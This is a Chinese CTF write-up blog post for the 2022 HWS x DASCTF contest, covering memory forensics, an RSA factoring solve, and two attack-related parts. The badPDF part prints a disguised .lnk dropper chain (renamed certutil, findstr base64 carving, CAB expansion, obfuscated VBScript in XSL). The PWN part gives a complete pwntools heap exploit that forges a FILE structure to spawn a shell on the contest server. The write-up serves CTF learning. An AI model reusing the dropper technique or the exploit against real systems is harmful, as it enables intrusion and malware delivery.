2022HWS硬件安全冬令营 X DASCTF Jan部分Writeup

最新推荐文章于 2024-07-19 16:37:46 发布
最新推荐文章于 2024-07-19 16:37:46 发布
阅读量3.9k 收藏 3
点赞数 3
分类专栏: CTF_Writeup 文章标签: 网络安全 密码学 python pycharm 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42815161/article/details/122685385
版权

文章目录

MISC

badPDF

gogogo

PWN

送分题

CRYPTO

babyrsa

MISC

badPDF

首先是一个lnk的windows快捷方式,使用windows打开,会看到一个一闪而过的cmd,然后打开了一个pdf。运行之后文件的结构似乎会发生改变,看了下快捷方式的指向内容发现了东西。

%SystemRoot%\system32\cmd.exe /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\\g4ZokyumBB2gDn.tmp /y
&for /r C:\\Windows\\System32\\ %i in (*ertu*.exe) do copy %i %tmp%\\msoia.exe /y
&findstr.exe "TVNDRgAAAA" %tmp%\\g4ZokyumBB2gDn.tmp > %tmp%\\cSi1r0uywDNvDu.

去%tmp%目录中模拟工作过程

findstr.exe "TVNDRgAAAA" g4ZokyumBB2gDn.tmp >00hululu
.\msoia.exe -decode .\00hululu 11hahaha
expand .\11hahaha -F:* ./

得到文件cSi1r0uywDNvDu.tmp

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
 <ms:script implements-prefix="user" language="VBScript">
 <![CDATA[
 rBOH7OLTCVxzkH = HrtvBsRh3gNUbe("676d60667a64333665326564333665326564333665326536653265643336656564333665327c"):
 execute(rBOH7OLTCVxzkH):
	function HrtvBsRh3gNUbe(bhhz6HalbOkrki):
		for rBOH7OLTCVxzkH= 1 to len(bhhz6HalbOkrki) step 2:
			HrtvBsRh3gNUbe = HrtvBsRh3gNUbe & chr(asc(chr("&h" & mid(bhhz6HalbOkrki,rBOH7OLTCVxzkH,2)))xor 1):
			next:
	end function:
 ]]> </ms:script>
</stylesheet>

去混淆后

for i= 1 to to len(676d60667a64333665326564333665326564333665326536653265643336656564333665327c) step 2:
	flag = flag & chr(asc(chr("&h" & mid(676d60667a64333665326564333665326564333665326536653265643336656564333665327c,i,2)))xor 1):
	next:

 直接解密拿到flag

gogogo

题目给了一个raw一组拼图,直接拼手撸轻轻松松(完整图片其实是后期脚本跑出来的

获得密码,smd5查了一下发现是123456easyx的md5,不过没什么用

3e8f092d4d7b80ce338d6e238efb01

随后镜像取证

Python vol.py -f 2.raw filescan | grep -E ".zip|.rar|.jpg|.png|.txt|.bmp|.7z"

发现csgo.zip,直接dump出来。是个加密压缩包,用上面的密码进行解压。binwalk文件后拿到一张jpg

Aztec码,ps加上中间缺少的部分

 用中国编码直接扫出flag:flag{fbab8380-a642-48aa-89b1-8e251f826b12}

 

PWN

送分题

真·送分原题,http://www.suphp.cn/anquanke/12/258512.html#

利用UAF来进行Unsortbin Attack,修改Global_max_fast的值为main_arena+96,那么程序最后会释放掉堆块,此时很大的堆块都被放到fastbin链表中,每个fastbin链表的头结点会在libc空间存有一个指针.

利用步骤一来劫持_IO_list_all指针,伪造一个File的结构体,利用 _IO_str_finish来Getshell.

旧exp直接打

from pwn import *

# from LibcSearcher import *
context.log_level = 'debug'
debug = 0
file_name = './pwn'
libc_name = './libc-2.27.so'
ip = '1.13.162.249'
prot = '10001'
if debug:
    r = process(file_name)
    libc = ELF(libc_name)
else:
    r = remote(ip, int(prot))
    libc = ELF(libc_name)


def debug():
    gdb.attach(r)
    raw_input()


def pack_file(_flags=0,
              _IO_read_ptr=0,
              _IO_read_end=0,
              _IO_read_base=0,
              _IO_write_base=0,
              _IO_write_ptr=0,
              _IO_write_end=0,
              _IO_buf_base=0,
              _IO_buf_end=0,
              _IO_save_base=0,
              _IO_backup_base=0,
              _IO_save_end=0,
              _IO_marker=0,
              _IO_chain=0,
              _fileno=0,
              _lock=0,
              _wide_data=0,
              _mode=0):
    file_struct = p32(_flags) + \
                  p32(0) + \
                  p64(_IO_read_ptr) + \
                  p64(_IO_read_end) + \
                  p64(_IO_read_base) + \
                  p64(_IO_write_base) + \
                  p64(_IO_write_ptr) + \
                  p64(_IO_write_end) + \
                  p64(_IO_buf_base) + \
                  p64(_IO_buf_end) + \
                  p64(_IO_save_base) + \
                  p64(_IO_backup_base) + \
                  p64(_IO_save_end) + \
                  p64(_IO_marker) + \
                  p64(_IO_chain) + \
                  p32(_fileno)
    file_struct = file_struct.ljust(0x88, b"\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, b"\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, b'\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, b"\x00")
    return file_struct


file = ELF(file_name)
sl = lambda x: r.sendline(x)
sd = lambda x: r.send(x)
sla = lambda x, y: r.sendlineafter(x, y)
rud = lambda x: r.recvuntil(x, drop=True)
ru = lambda x: r.recvuntil(x)
li = lambda name, x: log.info(name + ':' + hex(x))
ri = lambda: r.interactive()
ru('Now you can get a big box, what size?')
sl(str(0x1430))
ru('Now you can get a bigger box, what size?')
sl(str(0x5000))
ru('Do you want to rename?(y/n)')
sl('y')
ru('Now your name is:')
main_arena = u64(r.recv(6) + b'\x00\x00')
li("main_arena", main_arena)
libc_base = main_arena - 0x3ebca0
system = libc_base + libc.symbols['system']
global_max_fast = libc_base + 0x3ed940
IO_list_all = libc_base + libc.symbols['_IO_list_all']
IO_str_jumps = 0x3e8360 + libc_base
payload = p64(main_arena) + p64(global_max_fast - 0x10)
binsh = 0x00000000001b40fa + libc_base
sl(payload)
# debug()
ru("Do you want to edit big box or bigger box?(1:big/2:bigger)\n")
sl("1")
ru(':\n')
fake_file = pack_file(_IO_read_base=IO_list_all - 0x10,
                      _IO_write_base=0,
                      _IO_write_ptr=1,
                      _IO_buf_base=binsh,
                      _mode=0, )
fake_file += p64(IO_str_jumps - 8) + p64(0) + p64(system)
sl(fake_file[0x10:])
ri()
flag{5hen_m3_5hi_kuai_1e_xin9_Qiu}

CRYPTO

babyrsa

import os
from secret import FLAG,p,q,e
from Crypto.Util.number import bytes_to_long,long_to_bytes


N = p*q

def encrypt(m,N,e):
	return pow(m,e,N)

def decrypt(c,N,d):
	return pow(c,d,N)

def padding(msg):
    res = msg
    if len(res) < 128:
        res = res + os.urandom(128-len(res))
    return res

def transfer(msg):
    assert len(msg) < 128
    m = padding(msg)
    return bytes_to_long(m)

if __name__ == "__main__":
    m = transfer(FLAG)
    print(N,e)
    print(encrypt(m,N,e))


#13123058934861171416713230498081453101147538789122070079961388806126697916963123413431108069961369055630747412550900239402710827847917960870358653962948282381351741121884528399369764530446509936240262290248305226552117100584726616255292963971141510518678552679033220315246377746270515853987903184512948801397452104554589803725619076066339968999308910127885089547678968793196148780382182445270838659078189316664538631875879022325427220682805580410213245364855569367702919157881367085677283124732874621569379901272662162025780608669577546548333274766058755786449491277002349918598971841605936268030140638579388226573929 2199344405076718723439776106818391416986774637417452818162477025957976213477191723664184407417234793814926418366905751689789699138123658292718951547073938244835923378103264574262319868072792187129755570696127796856136279813658923777933069924139862221947627969330450735758091555899551587605175567882253565613163972396640663959048311077691045791516671857020379334217141651855658795614761069687029140601439597978203375244243343052687488606544856116827681065414187957956049947143017305483200122033343857370223678236469887421261592930549136708160041001438350227594265714800753072939126464647703962260358930477570798420877
#1492164290534197296766878830710549288168716657792979479408332026408553210558539364503279432780006256047888761718878241924947937039103166564146378209168719163067531460700424309878383312837345239570897122826051628153030129647363574035072755426112229160684859510640271933580581310029921376842631120847546030843821787623965614564745724229763999106839802052036834811357341644073138100679508864747009014415530176077648226083725813290110828240582884113726976794751006967153951269748482024859714451264220728184903144004573228365893961477199925864862018084224563883101101842275596219857205470076943493098825250412323522013524

不用想多,N能直接分解,factordb.com

n = 13123058934861171416713230498081453101147538789122070079961388806126697916963123413431108069961369055630747412550900239402710827847917960870358653962948282381351741121884528399369764530446509936240262290248305226552117100584726616255292963971141510518678552679033220315246377746270515853987903184512948801397452104554589803725619076066339968999308910127885089547678968793196148780382182445270838659078189316664538631875879022325427220682805580410213245364855569367702919157881367085677283124732874621569379901272662162025780608669577546548333274766058755786449491277002349918598971841605936268030140638579388226573929
p = 98197216341757567488149177586991336976901080454854408243068885480633972200382596026756300968618883148721598031574296054706280190113587145906781375704611841087782526897314537785060868780928063942914187241017272444601926795083433477673935377466676026146695321415853502288291409333200661670651818749836420808033
q = 133639826298015917901017908376475546339925646165363264658181838203059432536492968144231040597990919971381628901127402671873954769629458944972912180415794436700950304720548263026421362847590283353425105178540468631051824814390421486132775876582962969734956410033443729557703719598998956317920674659744121941513
e = 2199344405076718723439776106818391416986774637417452818162477025957976213477191723664184407417234793814926418366905751689789699138123658292718951547073938244835923378103264574262319868072792187129755570696127796856136279813658923777933069924139862221947627969330450735758091555899551587605175567882253565613163972396640663959048311077691045791516671857020379334217141651855658795614761069687029140601439597978203375244243343052687488606544856116827681065414187957956049947143017305483200122033343857370223678236469887421261592930549136708160041001438350227594265714800753072939126464647703962260358930477570798420877
c = 1492164290534197296766878830710549288168716657792979479408332026408553210558539364503279432780006256047888761718878241924947937039103166564146378209168719163067531460700424309878383312837345239570897122826051628153030129647363574035072755426112229160684859510640271933580581310029921376842631120847546030843821787623965614564745724229763999106839802052036834811357341644073138100679508864747009014415530176077648226083725813290110828240582884113726976794751006967153951269748482024859714451264220728184903144004573228365893961477199925864862018084224563883101101842275596219857205470076943493098825250412323522013524

import binascii
import gmpy2

phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(binascii.unhexlify(hex(m)[2:].strip("L")))
# b'hwctf{01d_Curs3_c4Me_Again}vG\x03MC\xcd\xfd\x1d\x0bO\xcaV\x9b\x87vk\xd6\xb3\xbb\x8f\xc5\xd61\xdf7\x0f\x90\xc6\x17oj]\xf5J\xd4\xa9\xcc\xdb\xbe?\xb2(\xf0\xb2\xb6\x99b\xa7e\xa8\x82\xf7SY\xc7\xd9\xde\xc4\xb5\xe3q\xc1\xe8\xfeM\xbd\xbe\xfdD\xed\xb3\x12~\x9d\xba\xa4\xb0\xfek\x81\xc4-\x82\xb3%\xae4\x7fGl\x9a\xac\xc3\x91\xc1\xbc\x04\x03o\xa4\x8d'
塞纳河畔的春水
关注
专栏目录
2022HWS硬件安全冬令营预选赛 misc】BadPDF+gogogo WriteUp
ShenZ的博客
01-28 1174
2022HWS硬件安全冬令营预选赛 misc BadPDF gogogo BadPDF 附件:20200308-sitrep-48-covid-19.pdf.lnk VBScript ``` rBOH7OLTCVxzkH=HrtvBsRh3gNUbe("676d60667a64333665326564333665326564333665326536653265643336656564333665327c") execute(rBOH7OLTCVxzkH) function HrtvBsRh3gNUbe(
HWS计划2021硬件安全冬令营线上选拔赛
weixin_43868725的博客
02-03 2798
REVERSE decryption 直接按照算法爆破(都是可见字符) exp buf=[0x12,0x45,0x10,0x47,0x19,0x49,0x49,0x49,0x1a,0x4f,0x1c,0x1e,0x52,0x66,0x1d,0x52,0x66,0x67,0x68,0x67,0x65,0x6f,0x5f,0x59,0x58,0x5e,0x6d,0x70,0xa1,0x6e,0x70,0xa3] temp=[0x2d,0x30,0x31,0x32,0x33,0x34,0x35,0x36,0x3
2022HWS硬件安全冬令营 X DASCTF Jan部分wp
weixin_52829570的博客
01-25 3518
Misc gogogo 下载解压得到两个文件夹,一个是一堆拼图,一个是raw文件所以进行拼图和取证 取证步骤 上来先看imageinfo python2 vol.py -f 2.raw imageinfo 看下桌面 python2 vol.py -f 2.raw --profile=WinXPSP2x86 filescan | grep "桌面" 发现有个zip文件,导出zip文件 python2 vol.py -f 2.raw dumpfiles -Q 0x00000000..
[2022DASCTF X SU 三月春季挑战赛]easyre
最新发布
2301_80820096的博客
07-19 402
拿到附件查看一下信息32位aspack壳脱完壳后用ida打开:跟进这个函数很明显是一个base58加密,但经过验证并没用。继续跟进:最后判断条件就是让byte_492a60和v2做比较,byte_492a60就是加密后的flag往上看很容易看到加密逻辑如果知道key就能进行解密,这里我尝试了在ida中动态调试但结果会报错。我尝试使用od找key。
HWS-2022 夏令营线上赛 WP
CourserLi的博客
08-01 1430
HWS-2022 硬件安全在线夏令营线上预选赛 WP
安恒信息HWS计划2021硬件冬令营 物联网安全课堂笔记 2021.1.10
4pri1
01-12 847
使用幕布制作的笔记,无法直接导入,内容如图,文件下载自取。 链接:https://pan.baidu.com/s/1ayILSjAPD9Gmc8fdM-1rIQ 提取码:4pri 复制这段内容后打开百度网盘手机App,操作更方便哦–来自百度网盘超级会员V2的分享 ...
安恒信息HWS计划2021硬件冬令营 物联网安全课堂笔记 2021.1.10-附件资源
03-05
安恒信息HWS计划2021硬件冬令营 物联网安全课堂笔记 2021.1.10-附件资源
HWS计划2021硬件安全冬令营线上选拔赛 re wp
qq_37439229的博客
02-01 2295
感觉这比赛比较简单。。。花了一天时间做,直接ak逆向了 decription 弱智题,爆破就行 a = [ 0x12, 0x45, 0x10, 0x47, 0x19, 0x49, 0x49, 0x49, 0x1A, 0x4F, 0x1C, 0x1E, 0x52, 0x66, 0x1D, 0x52, 0x66, 0x67, 0x68, 0x67, 0x65, 0x6F, 0x5F, 0x59, 0x58, 0x5E, 0x6D, 0x70, 0xA1, 0x6E, 0x70, 0xA3] b
2022DASCTF easyre
weixin_49764009的博客
03-27 597
基本面 32位 ASPack壳 既然是签到题应该不会太难把 手动脱壳 直接ESP定律就可以了 可以参考之前写过的帖子 基本一样 https://blog.csdn.net/weixin_49764009/article/details/122059947 注意入口的位置 这个位置才是正确的入口位置 一开始找错了 真是给我整不会了 静态分析 int __cdecl main(int argc, const char **argv, const char **envp) { unsigned __i
[Re]2022DASCTF Apr X FATE 防疫挑战赛
PMR的博客
04-24 782
[Re]2022DASCTF Apr X FATE Crackme
2022DASCTF MAY 出题人挑战赛 misc
mumuzi的博客
05-22 2896
MAYMISC
2022DASCTF X SU Re WriteUp
Whitebird的博客
04-01 1131
2022DASCTF X SU Re WriteUpeasyreStarGate easyre 一道签到题,老样子先查壳 asp壳比较容易脱,可以百度了解一下,我直接通过ESP定律脱的,然后把内存dump下来用IDA分析 通过字符串定位来到加密函数,下面的v2数组是密文,str数组是我们输入的flag,分析了一下sub_401500、sub_40152B、sub_401593,是一个变种的RC4. 如果是正常RC4,我们可以用脚本或者网站解,变种虽然也可以硬逆,但是比较麻烦。我这里是直接动调出密钥流,R
2022年3月buu月赛dasctf
weixin_51458899的博客
03-27 6435
2022年3月buu月赛dasctf web ezpop <?php class what { public $a; public function __construct(){ $this->a = new fin(); } } class mix{ public $m1; public function __construct(){ $this->m1 = "?><?=system('cat
DASCTF 2022九月赛WEB
weixin_43952190的博客
09-22 822
CTF
2022DASCTF Apr X FATE 防疫挑战赛web复现
qq_58970968的博客
05-05 269
打开可看到是代码审计,现在的我的水平显然不会做: 所以参考了其他师父的wp;勉勉强强知道点流程,大概就是不断调用各种类中的方法; 首先拿到四个代码,如下: Base.php <?php class Base { public function __get($name) { $getter = 'get' . $name; if (method_exists($this, $getter)) { return $t
2022DASCTF X SU 三月春季挑战赛
m0_56059226的博客
03-27 972
web ezpop <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public $f1; ..
2022DASCTF X SU 三月春季挑战赛web部分
XINO
03-28 833
简单写一下
DASCTF X SU-2022-Crypto-FlowerCipher之暴力暴力求解法(z3约束器)
MangoFengC++
03-27 712
题目 from pickle import LONG1 from secret import flag import random # flag = b'flag{%s}' % md5(something).hexdigest() # note that md5 only have characters 'abcdef' and digits def Flower(x, key): flower = random.randint(0, 4096) return x * (key ** 3
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

塞纳河畔的春水

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值